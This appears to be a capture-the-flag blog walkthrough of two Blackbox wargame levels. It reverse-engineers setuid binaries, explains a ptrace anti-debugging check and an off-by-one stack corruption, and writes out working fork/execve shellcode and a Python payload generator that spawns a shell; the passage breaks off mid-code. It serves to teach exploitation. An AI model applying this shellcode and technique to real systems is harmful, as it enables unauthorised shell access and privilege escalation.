 80484b1: c7 44 24 0c 00 00 00  movl   $0x0,0xc(%esp)
 80484b8: 00 
 80484b9: c7 44 24 08 01 00 00  movl   $0x1,0x8(%esp)
 80484c0: 00 
 80484c1: c7 44 24 04 00 00 00  movl   $0x0,0x4(%esp)
 80484c8: 00 
 80484c9: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 80484d0: e8 7f fe ff ff        call   8048354 <ptrace@plt>
 80484d5: 85 c0                 test   %eax,%eax
 80484d7: 79 18                 jns    80484f1 <main+0x8d>
 80484d9: c7 04 24 cc 86 04 08  movl   $0x80486cc,(%esp)
 80484e0: e8 5f fe ff ff        call   8048344 <puts@plt>
 80484e5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ec: e8 93 fe ff ff        call   8048384 <exit@plt>
 80484f1: 8b bd 04 fc ff ff     mov    0xfffffc04(%ebp),%edi
 80484f7: 8b 47 04              mov    0x4(%edi),%eax
 80484fa: 83 c0 04              add    $0x4,%eax
 80484fd: 8b 00                 mov    (%eax),%eax
 80484ff: c7 44 24 08 e7 03 00  movl   $0x3e7,0x8(%esp)
 8048506: 00 
 8048507: 89 44 24 04           mov    %eax,0x4(%esp)
 804850b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048511: 89 04 24              mov    %eax,(%esp)
 8048514: e8 7b fe ff ff        call   8048394 <strncpy@plt>
 8048519: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 804851f: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 8048524: 89 85 00 fc ff ff     mov    %eax,0xfffffc00(%ebp)
 804852a: b0 00                 mov    $0x0,%al
 804852c: fc                    cld    
 804852d: 8b bd 00 fc ff ff     mov    0xfffffc00(%ebp),%edi
 8048533: f2 ae                 repnz scas %es:(%edi),%al
 8048535: 89 c8                 mov    %ecx,%eax
 8048537: f7 d0                 not    %eax
 8048539: 48                    dec    %eax
 804853a: 40                    inc    %eax
 804853b: c6 84 05 10 fc ff ff  movb   $0x0,0xfffffc10(%ebp,%eax,1)
 8048542: 00 
 8048543: c7 44 24 04 24 00 00  movl   $0x24,0x4(%esp)
 804854a: 00 
 804854b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048551: 89 04 24              mov    %eax,(%esp)
 8048554: e8 db fd ff ff        call   8048334 <strchr@plt>
 8048559: 85 c0                 test   %eax,%eax
 804855b: 74 18                 je     8048575 <main+0x111>
 804855d: c7 04 24 ec 86 04 08  movl   $0x80486ec,(%esp)
 8048564: e8 0b fe ff ff        call   8048374 <printf@plt>
 8048569: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 8048570: e8 0f fe ff ff        call   8048384 <exit@plt>
 8048575: c7 04 24 f8 86 04 08  movl   $0x80486f8,(%esp)
 804857c: e8 f3 fd ff ff        call   8048374 <printf@plt>
 8048581: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048587: 89 04 24              mov    %eax,(%esp)
 804858a: e8 e5 fd ff ff        call   8048374 <printf@plt>
 804858f: b8 00 00 00 00        mov    $0x0,%eax
 8048594: 81 c4 10 04 00 00     add    $0x410,%esp
 804859a: 59                    pop    %ecx
 804859b: 5f                    pop    %edi
 804859c: 5d                    pop    %ebp
 804859d: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80485a0: c3                    ret
The first few lines, up to the cmpl & je, should be familiar (if not, see the previous chapter for a detailed description). They mean, first, that the address of the arguments is stored at ebp-0x3fc, and second, that the program expects exactly one argument.
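This older objdump prints negative displacements as unsigned 32-bit numbers, so 0xfffffc04(%ebp) is really ebp-0x3fc. The conversion is plain two's complement arithmetic; here is a short Python sketch of it, with helper names made up for this example:

```python
def signed32(value: int) -> int:
    """Interpret a 32-bit unsigned value as a two's complement integer."""
    return value - (1 << 32) if value & 0x80000000 else value


def ebp_offset(displacement: int) -> str:
    """Render an objdump displacement as a readable ebp-relative offset."""
    offset = signed32(displacement)
    sign = "-" if offset < 0 else "+"
    return f"ebp{sign}{abs(offset):#x}"


for raw in (0xFFFFFC04, 0xFFFFFC10, 0xFFFFFC00):
    print(hex(raw), "->", ebp_offset(raw))
```

The other two values are the displacements that show up further down in the listing.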

The next lines are somewhat more tricky and important to this level:
 80484b1: c7 44 24 0c 00 00 00  movl   $0x0,0xc(%esp)
 80484b8: 00 
 80484b9: c7 44 24 08 01 00 00  movl   $0x1,0x8(%esp)
 80484c0: 00 
 80484c1: c7 44 24 04 00 00 00  movl   $0x0,0x4(%esp)
 80484c8: 00 
 80484c9: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 80484d0: e8 7f fe ff ff        call   8048354 <ptrace@plt>
 80484d5: 85 c0                 test   %eax,%eax
 80484d7: 79 18                 jns    80484f1 <main+0x8d>
The called function is ptrace, and it is called with the following parameters: ptrace(0, 0, 1, 0). Then the sign of the return value is tested (jns jumps if the value is not negative), and a jump is performed accordingly.
Now, what is this ptrace, what are the arguments, and why is it crucial for this level?
Well, ptrace is a system call, and we can find some documentation about it in the man pages (cropped for brevity and relevance, you can find the full man-pages by invoking man ptrace):
PTRACE(2)                 Linux Programmer's Manual                 PTRACE(2)

NAME
       ptrace - process trace

SYNOPSIS
       #include <sys/ptrace.h>

       long ptrace(enum __ptrace_request request, pid_t pid,
                   void *addr, void *data);

DESCRIPTION
       The  ptrace()  system  call provides a means by which a parent process
       may observe and control the execution of another process, and  examine
       and  change  its  core  image  and registers.  It is primarily used to
       implement breakpoint debugging and system call tracing.

       The parent can initiate a trace by  calling  fork(2)  and  having  the
       resulting  child  do  a  PTRACE_TRACEME,  followed  (typically)  by an
       exec(3).  Alternatively, the parent may commence trace of an  existing
       process using PTRACE_ATTACH.  (See additional notes below.)
...
       The value of request determines the action to be performed:

       PTRACE_TRACEME
              Indicates that this process is to be traced by its parent.  Any
              signal (except SIGKILL) delivered to this process will cause it
              to  stop  and its parent to be notified via wait(2).  Also, all
              subsequent calls to execve(2) by this process will cause a SIG‐
              TRAP  to be sent to it, giving the parent a chance to gain con‐
              trol before the new program begins execution.  A process proba‐
              bly  shouldn't  make this request if its parent isn't expecting
              to trace it.  (pid, addr, and data are ignored.)

       The above request is used only by the child process; the rest are used
       only  by  the  parent.   In  the following requests, pid specifies the
       child process to be acted on.  For requests  other  than  PTRACE_KILL,
       the child process must be stopped.
...
RETURN VALUE
       On  success,  PTRACE_PEEK*  requests  return the requested data, while
       other requests return zero.  On error, all  requests  return  -1,  and
       errno  is set appropriately.  Since the value returned by a successful
       PTRACE_PEEK* request may be -1, the caller must check errno after such
       requests to determine whether or not an error occurred.
...
OK, what can we learn from the man pages:
  1. The ptrace system-call receives 4 parameters: a request code, a pid, an address pointer and a data pointer.
  2. The request code used in our case is 0, which corresponds to PTRACE_TRACEME. What this request does is make the process behave in a traceable fashion, which involves, among other things, making it stop before any call to execve. Also, all the rest of the arguments are ignored.
  3. The function returns -1 on failure.
So, in our case, if ptrace fails, it will return -1 and the test instruction will set the sign flag, which means that the jns branch will not be taken and we go to:
 80484d9: c7 04 24 cc 86 04 08  movl   $0x80486cc,(%esp)
 80484e0: e8 5f fe ff ff        call   8048344 <puts@plt>
 80484e5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ec: e8 93 fe ff ff        call   8048384 <exit@plt>
That's just an error print and an exit.
When will it fail? Well, if the process is already being traced, ptrace will fail, which is what happens if we try to debug the program by running it in gdb. This can be averted by setting a breakpoint at the test instruction and changing the value of eax so that the test passes. This is not important for this level, but it's good to know.
The really important thing is that, since the process is in trace mode, we can't execute a shellcode that has an execve system call in it.
Bear that in mind as we continue to analyze the program.
 80484f1: 8b bd 04 fc ff ff     mov    0xfffffc04(%ebp),%edi
 80484f7: 8b 47 04              mov    0x4(%edi),%eax
 80484fa: 83 c0 04              add    $0x4,%eax
 80484fd: 8b 00                 mov    (%eax),%eax
This just loads eax with the address of argv[1] (again, should be familiar from the previous chapter).
 80484ff: c7 44 24 08 e7 03 00  movl   $0x3e7,0x8(%esp)
 8048506: 00 
 8048507: 89 44 24 04           mov    %eax,0x4(%esp)
 804850b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048511: 89 04 24              mov    %eax,(%esp)
 8048514: e8 7b fe ff ff        call   8048394 <strncpy@plt>
Now, this is a call to a safe strncpy with the destination being ebp-0x3f0, which we will call from now on buf, the source being argv[1] and the maximum size limit being 0x3e7.
The next piece of code is a bit tricky:
 8048519: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 804851f: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 8048524: 89 85 00 fc ff ff     mov    %eax,0xfffffc00(%ebp)
 804852a: b0 00                 mov    $0x0,%al
 804852c: fc                    cld    
 804852d: 8b bd 00 fc ff ff     mov    0xfffffc00(%ebp),%edi
 8048533: f2 ae                 repnz scas %es:(%edi),%al
 8048535: 89 c8                 mov    %ecx,%eax
 8048537: f7 d0                 not    %eax
 8048539: 48                    dec    %eax
This is basically an inline implementation of strlen with buf as the argument. For a more in depth explanation of how this works you can check out this article. Bottom line, eax now contains the length of buf, which is the number of bytes until the first string terminator.
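To make the repnz scas trick concrete, here is a minimal Python 3 sketch that models the same register arithmetic. The function name scas_strlen is made up for illustration, and the model only mimics the instructions shown above, not the real CPU:

```python
def scas_strlen(memory, start):
    """Model of the inline strlen: repnz scasb followed by not/dec."""
    ecx = 0xFFFFFFFF                  # mov $0xffffffff,%ecx
    edi = start                       # edi points at the start of buf
    while ecx != 0:
        byte = memory[edi]            # scas compares %al (0x00) with the byte at (%edi)
        edi += 1
        ecx = (ecx - 1) & 0xFFFFFFFF  # every scanned byte costs one count
        if byte == 0:                 # repnz stops once the compared bytes are equal
            break
    eax = (~ecx) & 0xFFFFFFFF         # not %eax
    return eax - 1                    # dec %eax


print(scas_strlen(b"hello\x00garbage", 0))  # 5
```

The terminator itself is counted by ecx, which is why the final dec is needed to get the usual strlen result.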
However, and this is important, there is an interesting point about strncpy: if the source string is as long as the limit or longer, it will not terminate the string at the destination. This means that buf will not necessarily have a string terminator inside it, and then strlen will keep searching up the rest of the stack for a 0x00.
 804853a: 40                    inc    %eax
 804853b: c6 84 05 10 fc ff ff  movb   $0x0,0xfffffc10(%ebp,%eax,1)
 8048542: 00 
This puts a string terminator one byte past the 0x00 that strlen found (because of the inc, the write goes to buf[len+1]).
 8048543: c7 44 24 04 24 00 00  movl   $0x24,0x4(%esp)
 804854a: 00 
 804854b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048551: 89 04 24              mov    %eax,(%esp)
 8048554: e8 db fd ff ff        call   8048334 <strchr@plt>
 8048559: 85 c0                 test   %eax,%eax
 804855b: 74 18                 je     8048575 <main+0x111>
This performs a search on buf for the character '$'=0x24 using strchr, which if successful, returns some non-0 pointer to the character, or NULL on failure.
If the search is successful, i.e. we have a '$' in our buffer, we are turned towards:
 804855d: c7 04 24 ec 86 04 08  movl   $0x80486ec,(%esp)
 8048564: e8 0b fe ff ff        call   8048374 <printf@plt>
 8048569: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 8048570: e8 0f fe ff ff        call   8048384 <exit@plt>
This prints a message and exits. This is important since this path does not lead to a return from main.
If we do not have a '$' in buf, we go to:
 804857c: e8 f3 fd ff ff        call   8048374 <printf@plt>
 8048581: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048587: 89 04 24              mov    %eax,(%esp)
 804858a: e8 e5 fd ff ff        call   8048374 <printf@plt>
 804858f: b8 00 00 00 00        mov    $0x0,%eax
 8048594: 81 c4 10 04 00 00     add    $0x410,%esp
 804859a: 59                    pop    %ecx
 804859b: 5f                    pop    %edi
 804859c: 5d                    pop    %ebp
 804859d: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80485a0: c3                    ret
Which contains a return from main.
Now, here I'd like to discuss the last few lines of code in detail. When ret is executed, it pops whatever esp points to and jumps there.
Notice that right before the return, esp is loaded with ecx-4, and that ecx itself was just popped from the stack.
Before we continue, I just want to sketch the stack:
Now suppose this scenario:
  1. We supply a very long argument to the program (its exact length is yet to be determined).
  2. The length is chosen so that the stored ecx is 0xbfff0100.
  3. This will make strlen stop when it reaches the LSB of the stored ecx, which means that a new 0x00 byte will be written over the second byte of the stored ecx, resulting in 0xbfff0000, which is an address 256 bytes lower than the original ecx.
  4. That address is actually an address inside buf.
  5. At the end of main, that address minus 4 is loaded into esp, so we make sure that the long word stored there is the address of the bottom of buf. The ret will then jump to it.
  6. The bottom of buf itself will contain a shellcode.
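The scenario above can be played out on a toy model of the stack frame. This is a Python 3 sketch under stated assumptions: the frame is modeled as a flat byte array from ebp-0x3f0 up to ebp, the byte at ebp-9 (which strncpy never touches) is assumed to be non-zero, and the name simulate is made up for illustration:

```python
import struct

BUF_OFF = 0x3F0   # buf starts at ebp-0x3f0
ECX_OFF = 0x8     # the saved ecx lives at ebp-8
LIMIT = 0x3E7     # strncpy size limit


def simulate(arg, saved_ecx, gap_byte=0x41):
    """Return the saved ecx after strncpy, strlen and the terminator write."""
    # frame[k] models the byte at address ebp-0x3f0+k. The bytearray starts
    # zeroed, which also models strncpy's NUL padding for short arguments.
    frame = bytearray(BUF_OFF)
    frame[LIMIT] = gap_byte  # ASSUMPTION: the byte at ebp-9 is non-zero
    struct.pack_into("<L", frame, BUF_OFF - ECX_OFF, saved_ecx)
    n = min(len(arg), LIMIT)
    frame[:n] = arg[:n]      # strncpy never writes more than LIMIT bytes
    length = frame.index(0)  # the inline strlen
    frame[length + 1] = 0    # inc %eax ; movb $0x0,buf(%eax)
    return struct.unpack_from("<L", frame, BUF_OFF - ECX_OFF)[0]


print(hex(simulate(b"A" * 0x400, 0xBFFF0100)))  # 0xbfff0000
print(hex(simulate(b"short", 0xBFFF0100)))      # 0xbfff0100
```

With a short argument the extra 0x00 lands harmlessly inside buf. With a long one, strlen runs into the LSB of the stored ecx and the write clears its second byte.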
So, let's analyze how ecx might be affected. First, let's see what its value is without any arguments:
level7@blackbox:~$ gdb heybabe
GNU gdb 6.4.90-debian
...
(gdb) b main
Breakpoint 1 at 0x8048473
(gdb) run
Starting program: /home/level7/heybabe 

Breakpoint 1, 0x08048473 in main ()
(gdb) x/a $ebp-8
0xbfffda80:	0xbfffdaa0
We would like that to be 0xbfff0100. So let's try with an argument 0xbfffdaa0-0xbfff0100=0xd9a0 bytes long:
(gdb) run `python -c "print 'a'*0xd9a0"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/level7/heybabe `python -c "print 'a'*0xd9a0"`

Breakpoint 1, 0x08048473 in main ()
(gdb) x/a $ebp-8
0xbfff00e0:	0xbfff0100
Good. You can also see that ebp-8=0xbfff00e0 so ebp=0xbfff00e8.
This means that the tampered ecx will point to ebp-0xe8. So, 4 bytes below that, at ebp-0xec, we should prepare the address ebp-0x3f0=0xbffefcf8.
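The address arithmetic above is easy to get wrong by hand, so here it is again as a small Python 3 sketch. All the constants are the values observed in the gdb sessions above; the variable names are only for illustration:

```python
ECX_NO_ARGS = 0xBFFFDAA0  # saved ecx seen in gdb with no arguments
ECX_WANTED = 0xBFFF0100   # value we want the saved ecx to have
EBP = 0xBFFF00E0 + 8      # gdb showed ebp-8 = 0xbfff00e0 with the long argument

arg_len = ECX_NO_ARGS - ECX_WANTED      # how far the stack must be pushed down
tampered_ecx = ECX_WANTED & 0xFFFF00FF  # second byte zeroed by the terminator
new_esp = tampered_ecx - 4              # lea 0xfffffffc(%ecx),%esp
buf = EBP - 0x3F0                       # bottom of buf

print(hex(arg_len))             # 0xd9a0
print(hex(EBP - tampered_ecx))  # 0xe8
print(hex(EBP - new_esp))       # 0xec
print(hex(buf))                 # 0xbffefcf8
```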

Now that we have the structure of the payload figured out, we need to figure out the payload.

Remember that the call to ptrace with PTRACE_TRACEME will make the process stop before any call to execve.
How can we circumvent that? Well, the trace applies only to the process that called ptrace, so if we were to fork, the child process will not be traced, and can do whatever it wants without any limitations.
So what the shellcode needs to do is fork, the child should call execve, and the parent should wait for the child (this way we can interact with the shell and not cause it to just run in the background).
We want our shellcode to be the equivalent of the following C code:
pid = fork();
if (pid == 0) {
    execve(...);
} else {
    wait(NULL);
}
We have already worked out the code for the execve in the second chapter. Let's figure out the other two.
Instead of disassembling fork, I'll disassemble vfork, because fork under libc does not use the fork system call, but rather clone (look in notes of the fork man pages).
(gdb) disas vfork
Dump of assembler code for function vfork:
0x00c6f950 <vfork+0>:	pop    %ecx
0x00c6f951 <vfork+1>:	mov    %gs:0x4c,%edx
0x00c6f958 <vfork+8>:	mov    %edx,%eax
0x00c6f95a <vfork+10>:	neg    %eax
0x00c6f95c <vfork+12>:	jne    0xc6f963 <vfork+19>
0x00c6f95e <vfork+14>:	mov    $0x80000000,%eax
0x00c6f963 <vfork+19>:	mov    %eax,%gs:0x4c
0x00c6f969 <vfork+25>:	mov    $0xbe,%eax
0x00c6f96e <vfork+30>:	int    $0x80
...
Now for wait. The thing is, wait is not a system call by itself, wait4 is. The prototype for wait4 is:
pid_t wait4(pid_t pid, int *status, int options, struct rusage *rusage);
So wait(NULL) is equivalent to wait4(-1, NULL, 0, NULL). Using a pid of -1 means it waits for any child process (from the man page of waitpid).
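The same fork, exec and wait pattern can be tried from Python 3, whose os.wait4(pid, options) wraps the wait4 system call. This is only a sketch of the control flow the shellcode should have; the helper name run_and_wait is made up, and the child runs the Python interpreter itself instead of a shell so the example does not depend on any particular path:

```python
import os
import sys


def run_and_wait(argv):
    """fork, exec argv in the child, and reap the child from the parent."""
    pid = os.fork()
    if pid == 0:
        try:
            os.execv(argv[0], argv)
        finally:
            os._exit(127)  # only reached if the exec failed
    # pid -1 means "any child", options 0 means "block until one exits",
    # which is what wait(NULL) boils down to.
    reaped, status, _rusage = os.wait4(-1, 0)
    return reaped == pid, os.WEXITSTATUS(status)


if __name__ == "__main__":
    print(run_and_wait([sys.executable, "-c", "raise SystemExit(3)"]))
```

The parent blocks in wait4 until the child is done, which is what keeps the shell in the foreground in the real exploit.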
The disassembly of wait4's wrapper is:
(gdb) disas wait4
Dump of assembler code for function wait4:
0x00c6ef70 <wait4+0>:	push   %esi
0x00c6ef71 <wait4+1>:	push   %ebx
0x00c6ef72 <wait4+2>:	mov    0x18(%esp),%esi
0x00c6ef76 <wait4+6>:	mov    0x14(%esp),%edx
0x00c6ef7a <wait4+10>:	mov    0x10(%esp),%ecx
0x00c6ef7e <wait4+14>:	mov    0xc(%esp),%ebx
0x00c6ef82 <wait4+18>:	mov    $0x72,%eax
0x00c6ef87 <wait4+23>:	int    $0x80
...
So let's write our shellcode and try it out. I've written it with ptrace in the beginning so we can make sure it works under the same constraints as it would in the exploit.
level7@blackbox:/tmp$ cat > shellcode7.c
#include <sys/ptrace.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    int pid;
    pid = getpid();
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    __asm__(
        "xorl %eax,%eax\n\t"
        "movb $0xbe,%al\n\t"
        "int $0x80\n\t"
        "test %eax,%eax\n\t"
        "je child\n\t"
        "xorl %eax,%eax\n\t"
        "xorl %ebx,%ebx\n\t"
        "dec %ebx\n\t"
        "xorl %ecx,%ecx\n\t"
        "xorl %edx,%edx\n\t"
        "xorl %esi,%esi\n\t"
        "movb $0x72,%al\n\t"
        "int $0x80\n"
        "child:\n\t"
        "xorl  %eax,%eax\n\t"
        "pushl %eax\n\t"
        "pushl $0x68732f2f\n\t"
        "pushl $0x6e69622f\n\t"
        "movl  %esp, %ebx\n\t"
        "pushl %eax\n\t"
        "pushl %ebx\n\t"
        "movl  %esp, %ecx\n\t"
        "xorl  %edx, %edx\n\t"
        "movb  $0x0b, %al\n\t"
        "int $0x80"
    );
    return 0;
}

level7@blackbox:/tmp$ gcc -o shellcode7 shellcode7.c
level7@blackbox:/tmp$ ./shellcode7
sh-3.1$
It works.
Let's extract the raw code, and embed it in a script:
level7@blackbox:/tmp$ cat > gen7.py
import struct

SHELLCODE = "31c0b0becd8085c0740f31c031db4b31c931d231f6b072cd8031c050682f2f7368682f62696e89e3505389e131d2b00bcd80".decode("hex")
BUF = 0xbffefcf8

ARG = SHELLCODE
ARG += 'X' * (0x3f0 - 0xec - len(ARG))
ARG += struct.pack("<L", BUF)
ARG += 'X' * (0xd9a0 - len(ARG))

print ARG
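Before firing the payload it is worth checking that it contains no byte that would break it: a 0x00 would end the argument early, and a '$' (0x24) would trip the strchr check. The following Python 3 sketch rebuilds the argument according to the layout worked out above (shellcode at the bottom of buf, the address of buf at ebp-0xec) and scans it. The names build_arg and BAD_BYTES are made up for illustration:

```python
import struct

SHELLCODE = bytes.fromhex(
    "31c0b0becd8085c0740f31c031db4b31c931d231f6b072cd80"  # vfork + wait4
    "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80"  # execve("/bin//sh")
)
BUF = 0xBFFEFCF8           # bottom of buf, from the gdb session
BAD_BYTES = {0x00, 0x24}   # NUL ends the argument, '$' trips the strchr check
PTR_OFFSET = 0x3F0 - 0xEC  # distance from the bottom of buf to ebp-0xec


def build_arg():
    arg = SHELLCODE
    arg += b"X" * (PTR_OFFSET - len(arg))  # filler up to ebp-0xec
    arg += struct.pack("<L", BUF)          # the word that ret will pop
    arg += b"X" * (0xD9A0 - len(arg))      # pad to the required total length
    return arg


arg = build_arg()
bad = sorted(b for b in set(arg) if b in BAD_BYTES)
print(len(arg) == 0xD9A0, bad)  # True []
```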
Show time:
level7@blackbox:~$ ~/heybabe `python /tmp/gen7.py`
Walk the way of the 1337 one!1���̀��t1�1�K1�1�1��r̀1�Ph//shh/bin��PS��1Ò°
                                                                      XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX����XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXsh-3.1$ 
sh-3.1$ cat /home/level8/password
????????????
On to the next level (sorry for the spam there, but that IS the output)

Friday, January 27, 2012

Blackbox - chapter 6

As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Level 6. You should know the drill by now:
$ ssh -p 2225 level6@blackbox.smashthestack.org
level6@blackbox.smashthestack.org's password:
...
level6@blackbox:~$ ls -l
total 16
-rwsr-xr-x 1 level7 level7 7599 2008-01-24 05:09 fsp
-rw-r--r-- 1 root   level6   13 2007-12-29 14:10 password
-rw-r--r-- 1 root   root     32 2008-01-24 05:04 temp

Ah...no source file this time. Well, looks like we will have to make do with what we have.
Usually we start off with a disassembly of the .text section, but this time, I'd like to start off with the .rodata section because we will need it to better understand the disassembled code:
level6@blackbox:~$ objdump -s --section=.rodata fsp

fsp:     file format elf32-i386

Contents of section .rodata:
 8048610 03000000 01000200 75736167 65203a20  ........usage : 
 8048620 2573203c 61726775 6d656e74 3e0a0061  %s <argument>..a
 8048630 0074656d 70006e6f 20736567 6661756c  .temp.no segfaul
 8048640 74207965 740a00                      t yet..
The relevant strings can be seen in the right-hand column. Let's just make a little summary of addresses and the strings they contain:
8048618: usage : %s <argument>
804862f: a
8048631: temp
8048636: no segfault yet
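The summary above can be reproduced mechanically from the hex dump. Here is a Python 3 sketch that does it, assuming the section starts at 0x8048610 as objdump shows and that the first 8 bytes are not string data. The helper name c_strings is made up for illustration:

```python
BASE = 0x8048610
DUMP = (
    "03000000 01000200 75736167 65203a20 "
    "2573203c 61726775 6d656e74 3e0a0061 "
    "0074656d 70006e6f 20736567 6661756c "
    "74207965 740a00"
)


def c_strings(data, base, skip):
    """Map the address of every NUL-terminated string to its contents."""
    found = {}
    start = skip
    for i in range(skip, len(data)):
        if data[i] == 0:
            if i > start:
                found[base + start] = data[start:i].decode("ascii")
            start = i + 1
    return found


for addr, text in sorted(c_strings(bytes.fromhex(DUMP), BASE, 8).items()):
    print("%x: %r" % (addr, text))
```

Note that the usage string and "no segfault yet" both end with a newline, which the summary leaves out.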
Now we'll disassemble main from the .text section, and I'll go ahead and annotate the places with the above addresses:
level6@blackbox:~$ objdump -d fsp|grep -A49 "<main>:"
08048444 <main>:
 8048444: 8d 4c 24 04           lea    0x4(%esp),%ecx
 8048448: 83 e4 f0              and    $0xfffffff0,%esp
 804844b: ff 71 fc              pushl  0xfffffffc(%ecx)
 804844e: 55                    push   %ebp
 804844f: 89 e5                 mov    %esp,%ebp
 8048451: 51                    push   %ecx
 8048452: 81 ec 34 04 00 00     sub    $0x434,%esp
 8048458: 89 8d d8 fb ff ff     mov    %ecx,0xfffffbd8(%ebp)
 804845e: a1 36 86 04 08        mov    0x8048636,%eax          ;"no segfault yet"
 8048463: 89 45 e7              mov    %eax,0xffffffe7(%ebp)
 8048466: a1 3a 86 04 08        mov    0x804863a,%eax          ;"egfault yet"
 804846b: 89 45 eb              mov    %eax,0xffffffeb(%ebp)
 804846e: a1 3e 86 04 08        mov    0x804863e,%eax          ;"ult yet"
 8048473: 89 45 ef              mov    %eax,0xffffffef(%ebp)
 8048476: a1 42 86 04 08        mov    0x8048642,%eax          ;"yet"
 804847b: 89 45 f3              mov    %eax,0xfffffff3(%ebp)
 804847e: 0f b6 05 46 86 04 08  movzbl 0x8048646,%eax          ;"\0"
 8048485: 88 45 f7              mov    %al,0xfffffff7(%ebp)
 8048488: 8b 85 d8 fb ff ff     mov    0xfffffbd8(%ebp),%eax
 804848e: 83 38 01              cmpl   $0x1,(%eax)
 8048491: 7f 27                 jg     80484ba <main+0x76>
 8048493: 8b 95 d8 fb ff ff     mov    0xfffffbd8(%ebp),%edx
 8048499: 8b 42 04              mov    0x4(%edx),%eax
 804849c: 8b 00                 mov    (%eax),%eax
 804849e: 89 44 24 04           mov    %eax,0x4(%esp)
 80484a2: c7 04 24 18 86 04 08  movl   $0x8048618,(%esp)       ;"usage : %s <argument>"
 80484a9: e8 9a fe ff ff        call   8048348 <printf@plt>
 80484ae: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484b5: e8 9e fe ff ff        call   8048358 <exit@plt>
 80484ba: c7 44 24 04 2f 86 04  movl   $0x804862f,0x4(%esp)    ; "a"
 80484c1: 08 
 80484c2: c7 04 24 31 86 04 08  movl   $0x8048631,(%esp)       ; "temp"
 80484c9: e8 9a fe ff ff        call   8048368 <fopen@plt>
 80484ce: 89 45 f8              mov    %eax,0xfffffff8(%ebp)
 80484d1: 8b 95 d8 fb ff ff     mov    0xfffffbd8(%ebp),%edx
 80484d7: 8b 42 04              mov    0x4(%edx),%eax
 80484da: 83 c0 04              add    $0x4,%eax
 80484dd: 8b 00                 mov    (%eax),%eax
 80484df: 89 44 24 04           mov    %eax,0x4(%esp)
 80484e3: 8d 85 e7 fb ff ff     lea    0xfffffbe7(%ebp),%eax
 80484e9: 89 04 24              mov    %eax,(%esp)
 80484ec: e8 97 fe ff ff        call   8048388 <strcpy@plt>
 80484f1: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 80484f4: 89 44 24 04           mov    %eax,0x4(%esp)
 80484f8: 8d 45 e7              lea    0xffffffe7(%ebp),%eax
 80484fb: 89 04 24              mov    %eax,(%esp)
 80484fe: e8 25 fe ff ff        call   8048328 <fputs@plt>
 8048503: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 804850a: e8 49 fe ff ff        call   8048358 <exit@plt>
Now, one thing that should serve to guide us is that there is no return from main, only exit calls. This means that overwriting the return address will be of no use here.
Bearing that in mind, let's first reconstruct the image of the stack while trying to understand what the program does:
 8048444: 8d 4c 24 04           lea    0x4(%esp),%ecx
This means ecx points to the first argument of main, which is argc. A few lines later we can see:
 8048458: 89 8d d8 fb ff ff     mov    %ecx,0xfffffbd8(%ebp)
Which means that the address of argc is stored in ebp-0x428.
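This old objdump prints negative displacements as large unsigned numbers, so every offset from ebp in this walkthrough has to be converted by hand. A tiny Python 3 helper (the name signed32 is made up) does the two's complement conversion:

```python
def signed32(value):
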